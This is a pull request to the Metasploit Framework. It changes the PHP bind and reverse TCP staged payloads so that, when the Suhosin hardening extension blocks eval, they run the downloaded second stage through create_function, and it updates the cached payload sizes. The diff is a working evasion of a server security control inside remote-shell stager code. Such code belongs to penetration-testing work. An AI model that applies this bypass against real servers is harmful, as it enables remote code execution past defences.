### PR TITLE
suhosin compatibility added to staged payload

### DIFF
--- a/lib/msf/core/payload/php/bind_tcp.rb
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@@ -109,7 +109,15 @@ while (strlen($b) < $len) {
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
+{ 
+  $suhosin_bypass=create_function('', $b); 
+  $suhosin_bypass(); 
+} 
+else 
+{ 
+  eval($b); 
+}
 die();^
   end
 

--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -102,7 +102,15 @@ while (strlen($b) < $len) {
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
+{ 
+  $suhosin_bypass=create_function('', $b); 
+  $suhosin_bypass(); 
+} 
+else 
+{ 
+  eval($b); 
+}
 die();^
   end
 

--- a/modules/payloads/stagers/php/bind_tcp.rb
+++ b/modules/payloads/stagers/php/bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module MetasploitModule
 
-  CachedSize = 1188
+  CachedSize = 1338
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp

--- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module MetasploitModule
 
-  CachedSize = 1187
+  CachedSize = 1337
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp

--- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module MetasploitModule
 
-  CachedSize = 1361
+  CachedSize = 1511
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp

--- a/modules/payloads/stagers/php/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp'
 
 module MetasploitModule
 
-  CachedSize = 1362
+  CachedSize = 1512
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::BindTcp

--- a/modules/payloads/stagers/php/reverse_tcp.rb
+++ b/modules/payloads/stagers/php/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 966
+  CachedSize = 1116
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp

--- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 1140
+  CachedSize = 1290
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp


### PR DESCRIPTION
This fix is related to multiple other pull requests and issues.

Original Issue : https://github.com/rapid7/metasploit-framework/issues/8630
A fix for staged payload was never created and commited and only fix for non-staged payload was added.
That fix was incomplete and a pull request was submitted for non staged payloads in metasploit-payloads section : https://github.com/rapid7/metasploit-payloads/pull/227

additional references:
https://github.com/rapid7/metasploit-framework/pull/8756

Note: This will still not be able to work with 7.2+ PHP as the create_function doesn't works with 7.2+ PHP and above

